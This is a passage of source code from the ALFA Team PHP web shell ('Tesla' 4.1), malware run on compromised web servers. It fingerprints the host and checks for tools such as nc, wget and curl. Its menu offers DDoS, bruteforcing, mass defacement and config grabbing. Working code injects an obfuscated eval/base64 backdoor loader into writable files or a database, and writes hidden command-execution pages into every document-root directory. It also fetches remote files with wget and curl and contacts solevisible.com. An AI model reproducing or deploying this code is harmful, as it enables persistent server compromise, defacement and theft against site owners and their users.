alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php 
            echo "__ALFA_SECRET_KEY__";
            ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
</script>
<?php 
            echo "<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>\r\n<input type='hidden' name='a' value='dlfile'>\r\n<input type='hidden' name='c' value=''>\r\n<input type='hidden' name='file' value=''>\r\n</form>\r\n<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>\r\n<div id='a_loader'><img src='" . __showicon('loader') . "'></div>";
            $cmd_uname = alfaEx("uname -a", false, false);
            $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');
            if ($uname == "( php_uname ) Function Disabled !") {
                $GLOBALS["need_to_update_header"] = "true";
            }
            echo '
</head>
<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div id="up_bar_holder"></div>
<div class="whole">
<form method="post" name="mf" style="display:none;">
<input type="hidden" name="a">
<input type="hidden" name="c" value="' . $GLOBALS['cwd'] . '">';
            for ($s = 1; $s <= 10; $s++) {
                echo '<input type="hidden" name="alfa' . $s . '">';
            }
            echo "<input type=\"hidden\" name=\"charset\">\r\n</form>\r\n<div id='hidden_sh'><a class=\"alert_green\" target=\"_blank\" href=\"?solevisible\"><span style=\"color:#42ff59;\">Tesla</span><br><small>Version: <span class=\"hidden_shell_version\">4.1</span></small></a></div>\r\n<div class=\"header\"><table width=\"100%\" border=\"0\">\r\n<tr>\r\n<td width=\"3%\"><span class=\"header_vars\">Uname:</span></td>\r\n<td colspan=\"2\"><span class=\"header_values\" id=\"header_uname\">" . $uname . '</span></td>
</tr>
<tr>
<td><span class="header_vars">User:</span></td>
<td><span class="header_values" id="header_userid">' . $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>
</tr>
<tr>
<td><span class="header_vars">PHP:</span></td>
<td><b>' . @phpversion() . ' </b><span class="header_vars"> Safe Mode: ' . $safe_modes . '</span></td>
</tr>
<tr>
<td><span class="header_vars">ServerIP:</span></td>
<td><b>' . (!@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????' : @$_SERVER["SERVER_ADDR"]) . '</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> ' . @$_SERVER["REMOTE_ADDR"] . '</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
</tr>
<tr>
<td width="3%"><span class="header_vars">DateTime:</span></td>
<td colspan="2"><b>' . date('Y-m-d H:i:s') . '</b></td>
</tr>
<tr>
<td><span class="header_vars">Domains:</span></td>
<td width="76%"><span class="header_values" id="header_domains">';
            if ($GLOBALS['sys'] == 'unix') {
                $d0mains = _alfa_file("/etc/named.conf", false);
                if (!$d0mains) {
                    echo "Cant Read [ /etc/named.conf ]";
                    $GLOBALS["need_to_update_header"] = "true";
                } else {
                    $count = 0;
                    foreach ($d0mains as $d0main) {
                        if (@strstr($d0main, "zone")) {
                            preg_match_all('#zone "(.*)"#', $d0main, $domains);
                            flush();
                            if (strlen(trim($domains[1][0])) > 2) {
                                flush();
                                $count++;
                            }
                        }
                    }
                    echo "{$count} Domains";
                }
            } else {
                echo "Cant Read [ /etc/named.conf ]";
            }
            echo '</span></td>
</tr>
<tr>
<td height="16"><span class="header_vars">HDD:</span></td>
<td><span class="header_vars">Total:</span><b>' . alfaSize($totalSpace) . ' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' [' . (int) ($freeSpace / $totalSpace * 100) . '%]</b></td>
</tr>';
            if ($GLOBALS['sys'] == 'unix') {
                $useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
                if (!@ini_get('safe_mode')) {
                    if (strlen(alfaEx("id", false, false)) > 0) {
                        echo "<tr><td height=\"18\" colspan=\"2\"><span class=\"header_vars\">Useful : </span>";
                        $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzialfa2', 'nc', 'locate', 'suidperl');
                        $x = 0;
                        foreach ($userful as $item) {
                            if (alfaWhich($item)) {
                                $x++;
                                echo '<span class="header_values" style="margin-left: 4px;">' . $item . '</span>';
                            }
                        }
                        if ($x == 0) {
                            echo "<span class='header_values' id='header_useful'>--------------</span>";
                            $GLOBALS["need_to_update_header"] = "true";
                        }
                        echo "</td>\r\n</tr>\r\n<tr>\r\n<td height=\"0\" colspan=\"2\"><span class=\"header_vars\">Downloader: </span>";
                        $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
                        $x = 0;
                        foreach ($downloaders as $item2) {
                            if (alfaWhich($item2)) {
                                $x++;
                                echo '<span class="header_values" style="margin-left: 4px;">' . $item2 . '</span>';
                            }
                        }
                        if ($x == 0) {
                            echo "<span class='header_values' id='header_downloader'>--------------</span>";
                            $GLOBALS["need_to_update_header"] = "true";
                        }
                        echo "</td>\r\n</tr>";
                    } else {
                        echo $useful_downloader;
                        $GLOBALS["need_to_update_header"] = "true";
                    }
                } else {
                    echo $useful_downloader;
                    $GLOBALS["need_to_update_header"] = "true";
                }
            } else {
                echo "<tr><td height=\"18\" colspan=\"2\"><span class=\"header_vars\">Windows:</span><b>";
                echo alfaEx('ver', false, false);
                echo "</td>\r\n</tr> <tr>\r\n<td height=\"0\" colspan=\"2\"><span class=\"header_vars\">Downloader: </span><b>-------------</b></td>\r\n</tr></b>";
            }
            $quotes = function_exists('get_magic_quotes_gpc') ? get_magic_quotes_gpc() : '0';
            if ($quotes == "1" or $quotes == "on") {
                $magic = '<b><span class="header_on">ON</span>';
            } else {
                $magic = '<span class="header_off">OFF</span>';
            }
            echo '<tr>
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>' . Alfa_GetDisable_Function() . '</b></td>
</tr>
<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span>' . $curl . ' | <span class="header_vars">SSH2 : </span>' . $ssh2 . ' | <span class="header_vars">Magic Quotes : </span>' . $magic . ' | <span class="header_vars"> MySQL :</span>' . $mysql . ' | <span class="header_vars">MSSQL :</span>' . $mssql . ' | <span class="header_vars"> PostgreSQL :</span>' . $pg . ' | <span class="header_vars"> Oracle :</span>' . $or . ' ' . ($GLOBALS['sys'] == "unix" ? '| <span class="header_vars"> CGI :</span> ' . $cgi_shell : "") . '</td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></div></td>
</tr>
<tr>
<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>' . $open_b . '</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>' . $safe_exe . '</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>' . $safe_include . '</b></td>
</tr>
<tr>
<td height="11"><span class="header_vars">SoftWare: </span></td>
<td colspan="2"><b>' . @getenv('SERVER_SOFTWARE') . '</b></td>
</tr>';
            if ($GLOBALS['sys'] == "win") {
                echo '<tr>
<td height="12"><span class="header_vars">DRIVE:</span></td>
<td colspan="2"><b>' . $drives . '</b></td>
</tr>';
            }
            echo '<tr>
<td height="12"><span class="header_vars">PWD:</span></td>
<td colspan="2"><span id="header_cwd">' . $cwd_links . ' </span><a href="#action=fileman&path=' . $GLOBALS['home_cwd'] . '" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a></td>
</tr>
</table>
</div>
<div id="meunlist">
<ul>
';
            $li = array('proc' => 'Process', 'phpeval' => 'Eval', 'sql' => 'SQL Manager', 'dumper' => 'Database Dumper', 'coldumper' => 'Column Dumper', 'hash' => 'En-Decoder', 'connect' => 'BC', 'zoneh' => 'ZONE-H', 'dos' => 'DDOS', 'safe' => 'ByPasser', 'cgishell' => 'Cgi Shell', 'ssiShell' => 'SSI SHELL', 'cpcrack' => 'Hash Tools', 'portscanner' => 'Port Scaner', 'basedir' => 'Open BaseDir', 'mail' => 'Fake Mail', 'ziper' => 'Compressor', 'deziper' => 'DeCompressor', 'IndexChanger' => 'Index Changer', 'pwchanger' => 'Add New Admin', 'ShellInjectors' => 'Shell Injectors', 'php2xml' => 'PHP2XML', 'cloudflare' => 'CloudFlare', 'Whmcs' => 'Whmcs DeCoder', 'symlink' => 'Symlink', 'MassDefacer' => 'Mass Defacer', 'Crackers' => 'BruteForcer', 'searcher' => 'Searcher', 'config_grabber' => 'Config Grabber', 'fakepage' => 'Fake Page', 'archive_manager' => 'Archive Manager', 'cmshijacker' => 'CMS Hijacker', 'remotedl' => 'Remote Upload', 'inbackdoor' => 'Install BackDoor', 'whois' => 'Whois', 'selfrm' => 'Remove Shell');
            foreach ($li as $key => $value) {
                echo '<li><a id="menu_opt_' . $key . '" href="#action=options&path=' . $GLOBALS['cwd'] . '&opt=' . $key . '" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=' . $key . '\';g(\'' . $key . '\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">' . $value . '</a></li>' . "\n";
            }
            echo '</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&path=' . $GLOBALS['cwd'] . '&opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=settings\';g(\'settings\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">Alfa Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&path=' . $GLOBALS['cwd'] . '&opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=market\';g(\'market\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&path=' . $GLOBALS['cwd'] . '&opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=aboutus\';g(\'aboutus\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">About Us</a>' . (!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? '<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>' : '') . '</div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="' . $GLOBALS['cwd'] . '" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,\'/\',1);">New Tab +</div></div>';
        } else {
            @error_reporting("\x00\x00\x0f\x03\x18");
            @ini_set('error_log', NULL);
            @ini_set('log_errors', 0);
            @ini_set('max_execution_time', 0);
            @ini_set('magic_quotes_runtime', 0);
            @set_time_limit(0);
        }
    }
    function alfalogout()
    {
        @setcookie("AlfaUser", null, 2012);
        @setcookie("AlfaPass", null, 2012);
        unset($_COOKIE['AlfaUser'], $_COOKIE['AlfaPass']);
        echo "ok";
    }
    function showAnimation($name)
    {
        return '-webkit-animation: ' . $name . ' 800ms ease-in-out forwards;-moz-animation: ' . $name . ' 800ms ease-in-out forwards;-ms-animation: ' . $name . ' 800ms ease-in-out forwards;animation: ' . $name . ' 800ms ease-in-out forwards;';
    }
    function __showicon($r)
    {
        $s['btn'] = 'http://solevisible.com/images/btn.png';
        $s['alfamini'] = 'http://solevisible.com/images/alfamini.png';
        $s['loader'] = 'http://solevisible.com/images/loader.svg';
        //return 'data:image/png;base64,'.__get_resource($s[$r]);
        return $s[$r];
    }
    $alfasuccess = '
<form action="" method=post>
Command: <input name=c type=text size=100 value="<?php if (isset($_POST["c"])){print(stripslashes($_POST["c"]));} ?>">
<input type=submit>
</form>
<pre>
<?php if (isset($_POST["c"])){system(stripslashes($_POST["c"])." 2>&1");} ?>
</pre>';
    function alfainbackdoor()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick=\"g('inbackdoor',null,'file')\">| In File | </a><a href=javascript:void(0) onclick=\"g('inbackdoor',null,'db')\">| In DataBase | </a></h3></center>";
        $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
        $success = '<font color="green">Success...!';
        $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
        $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
        $cwd = 'Example: /home/alfa/public_html/index.php';
        if ($_POST['alfa1'] == 'file') {
            echo "<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\"><div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select> <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='Example: /home/alfa/public_html/index.php'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '><div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div></form></p></center>";
            if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa4'] != '') {
                $method = $_POST['alfa2'];
                $file = $_POST['alfa3'];
                $shell = $_POST['alfa4'];
                $key = str_replace(array('"', '\''), '', trim($_POST['alfa5']));
                if ($key == '') {
                    $key = 'alfa';
                }
                if ($method == 'my') {
                    $shell = __ZW5jb2Rlcg($shell);
                } else {
                    $shell = $GLOBALS['__ALFA_SHELL_CODE'];
                }
                $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="' . $key . '"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\\$c));");$x("' . $shell . '");exit;}?>';
                if (@is_file($file) && @is_writable($file)) {
                    @file_put_contents($file, $code . "\n" . @file_get_contents($file));
                    __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . '</font>');
                } else {
                    __alert($error);
                }
            }
        }
        if ($_POST['alfa1'] == 'db') {
            echo "<center><p><div class='txtfont_header'>| In DataBase |</div></p>" . getConfigHtml('all') . "<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50'));
            create_table($table);
            echo "<p>{$select}</p>";
            echo $textarea;
            echo "<p><input type='submit' value=' '></p></form></p></center>";
            if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa5'] != '' && $_POST['alfa6'] != '') {
                $dbhost = $_POST['alfa2'];
                $dbuser = $_POST['alfa3'];
                $dbpw = $_POST['alfa4'];
                $dbname = $_POST['alfa5'];
                $file = $_POST['alfa6'];
                $method = $_POST['alfa7'];
                $shell = $_POST['alfa8'];
                $key = str_replace(array('"', '\''), '', trim($_POST['alfa9']));
                if ($key == '') {
                    $key = 'alfa';
                }
                if ($method == 'my') {
                    $shell = __ZW5jb2Rlcg($shell);
                } else {
                    $shell = $GLOBALS['__ALFA_SHELL_CODE'];
                }
                if ($conn = mysqli_connect($dbhost, $dbuser, $dbpw, $dbname)) {
                    $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="' . $key . '"){$conn=mysqli_connect("' . str_replace('"', '\\"', $dbhost) . '","' . str_replace('"', '\\"', $dbuser) . '","' . str_replace('"', '\\"', $dbpw) . '","' . str_replace('"', '\\"', $dbname) . '");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\\$c));");$x($r["code"]);exit;}?>';
                    if (@is_file($file) && @is_writable($file)) {
                        @mysqli_query($conn, 'DROP TABLE `alfa_bc`');
                        @mysqli_query($conn, 'CREATE TABLE `alfa_bc` (code LONGTEXT)');
                        @mysqli_query($conn, 'INSERT INTO `alfa_bc` VALUES("' . $shell . '")');
                        @file_put_contents($file, $code . "\n" . @file_get_contents($file));
                        __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . '</font>');
                    } else {
                        __alert($error);
                    }
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    if (@(!$_SESSION["alfa07"])) {
        $doc = $_SERVER["DOCUMENT_ROOT"];
        $dir = scandir($doc);
        $d1 = '' . $doc . '/.';
        $d2 = '' . $doc . '/..';
        if (($key = @array_search('.', $dir)) !== false) {
            unset($dir[$key]);
            unset($dir[$key]);
        }
        if (($key = @array_search($d1, $dir)) !== false) {
            unset($dir[$key]);
        }
        if (($key = array_search($d2, $dir)) !== false) {
            unset($dir[$key]);
        }
        @array_push($dir, $doc);
        foreach ($dir as $d) {
            $p = $doc . "/" . $d;
            if (is_dir($p)) {
                $file = $p . "/." . $d . ".php";
                @touch($file);
                $folder = @fopen($file, "w");
                @fwrite($folder, $alfasuccess);
            }
        }
    }
    function alfawhois()
    {
        echo "<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>";
        if ($_POST['alfa2'] == '>>' && !empty($_POST['alfa1'])) {
            $site = str_replace(array('http://', 'https://', 'www.', 'ftp://'), '', $_POST['alfa1']);
            $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=' . $site;
            $data = @file_get_contents($target);
            if ($data == '') {
                $get = new AlfaCURL();
                $get->ssl = true;
                $data = $get->Send($target);
            }
            $target = @json_decode($data, true);
            echo __pre();
            if (is_array($target)) {
                echo $target["whois_raw"];
            } else {
                echo alfaEx("whois " . $site);
            }
        }
        echo "</div>";
    }
    function alfaremotedl()
    {
        alfahead();
        echo "<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>\r\n<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">\r\n<p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>\r\n<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='" . $GLOBALS['cwd'] . "'><p><input type='submit' value=' '></p>\r\n</form></p></center>";
        if (isset($_POST['alfa1'], $_POST['alfa2'], $_POST['alfa3']) && !empty($_POST['alfa1']) && $_POST['alfa3'] == '>>') {
            echo __pre();
            $url = $_POST['alfa1'];
            $path = $_POST['alfa2'];
            echo "<center>";
            if (__download($url, $path)) {
                echo "<font color=\"green\">Success...!</font>";
            } else {
                echo "<font color=\"red\">Error...!</font>";
            }
            echo "</center>";
        }
        echo "</div>";
        alfafooter();
    }
    function __download($url, $path = false)
    {
        if (!preg_match("/[a-z]+:\\/\\/.+/", $url)) {
            return false;
        }
        $saveas = basename(rawurldecode($url));
        if ($path) {
            $saveas = $path . $saveas;
        }
        if ($content = __read_file($url)) {
            if (@is_file($saveas)) {
                @unlink($saveas);
            }
            if (__write_file($saveas, $content)) {
                return true;
            }
        }
        $buff = alfaEx("wget " . $url . " -O " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("curl " . $url . " -o " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("lwp-download " . $url . " " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("lynx -source " . $url . " > " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("GET " . $url . " > " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("links -source " . $url . " > " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("fetch -o " . $saveas . " -p " . $url);
        if (@is_file($saveas)) {
            return true;
        }
        return false;
    }
    function clean_string($string)
    {
        if (function_exists("iconv")) {
            $s = trim($string);
            $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
        }
        return $s;
    }
    function __read_file($file, $boom = true)
    {
        $content = false;
        if ($fh = @fopen($file, "rb")) {
            $content = "";
            while (!feof($fh)) {
                $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
            }
            @fclose($fh);
        }
        if (empty($content) || !$content) {
            $content = alfaEx("cat '" . addslashes($file) . "'");
        }
        return $content;
    }
    function alfaMarket()
    {
        echo "<div class='header'>";
        $curl = new AlfaCURL();
        $content = $curl->Send("http://solevisible.com/market.ph");
        $data = @json_decode($content, true);
        if (!empty($data)) {
            if ($data["status"] == "open") {
                echo $data["content"];
            } else {
                echo $data["error_msg"];
            }
        } else {
            echo "<div style='text-align:center;font-size:20px;'>Cant connect to the alfa market....! try later.</div>";
        }
        echo "</div>";
    }
    function alfaSettings()
    {
        alfahead();
        AlfaNum(6, 7, 8, 9, 10);
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Settings |</div></p><h3><a href=javascript:void(0) onclick=\"g('settings',null,null,null,null,null,null,null,null,'main')\">| Generall Setting | </a></h3></center>";
        if ($_POST["alfa8"] == "main") {
            echo "<p><center><div class=\"txtfont_header\">| Settings |</div></p><form onSubmit=\"reloadSetting(this);return false;\" method='post'>";
            $lg_array = array('0' => 'No', '1' => 'Yes');
            $penc_array = array('false' => 'No', 'true' => 'Yes');
            $protect_html = "";
            $icon_html = "";
            $postEnc_html = "";
            $login_html = "";
            $cgiapi_html = "";
            foreach ($lg_array as $key => $val) {
                $protect_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['safemode'] == '1' ? 'selected' : '') . '>' . $val . '</option>';
            }
            foreach ($lg_array as $key => $val) {
                $icon_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['show_icons'] == '1' ? 'selected' : '') . '>' . $val . '</option>';
            }
            foreach ($penc_array as $key => $val) {
                $cgiapi_html .= '<option value="' . $key . '" ' . (!empty($_POST['alfa9']) && $_POST['alfa9'] == $key ? "selected" : ($GLOBALS["DB_NAME"]["cgi_api"] && empty($_POST['alfa9']) ? 'selected' : '')) . '>' . $val . '</option>';
            }
            foreach ($penc_array as $key => $val) {
                $postEnc_html .= '<option value="' . $key . '" ' . (!empty($_POST['alfa7']) && $_POST['alfa7'] == $key ? "selected" : (__ALFA_POST_ENCRYPTION__ && empty($_POST['alfa7']) ? 'selected' : '')) . '>' . $val . '</option>';
            }
            $lg_array = array("gui" => "GUI", "500" => "500 Internal Server Error", "403" => "403 Forbidden", "404" => "404 NotFound");
            foreach ($lg_array as $key => $val) {
                $login_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['login_page'] == $key ? 'selected' : '') . '>' . $val . '</option>';
            }
            echo "";
            echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">' . $protect_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">' . $cgiapi_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">' . $postEnc_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">' . $icon_html . '</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">' . $login_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="' . (empty($_POST['alfa3']) ? $GLOBALS['DB_NAME']['user'] : $_POST['alfa3']) . '" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="' . $GLOBALS['DB_NAME']['safemode'] . '"><input type="hidden" name="s" value="' . $GLOBALS['DB_NAME']['show_icons'] . 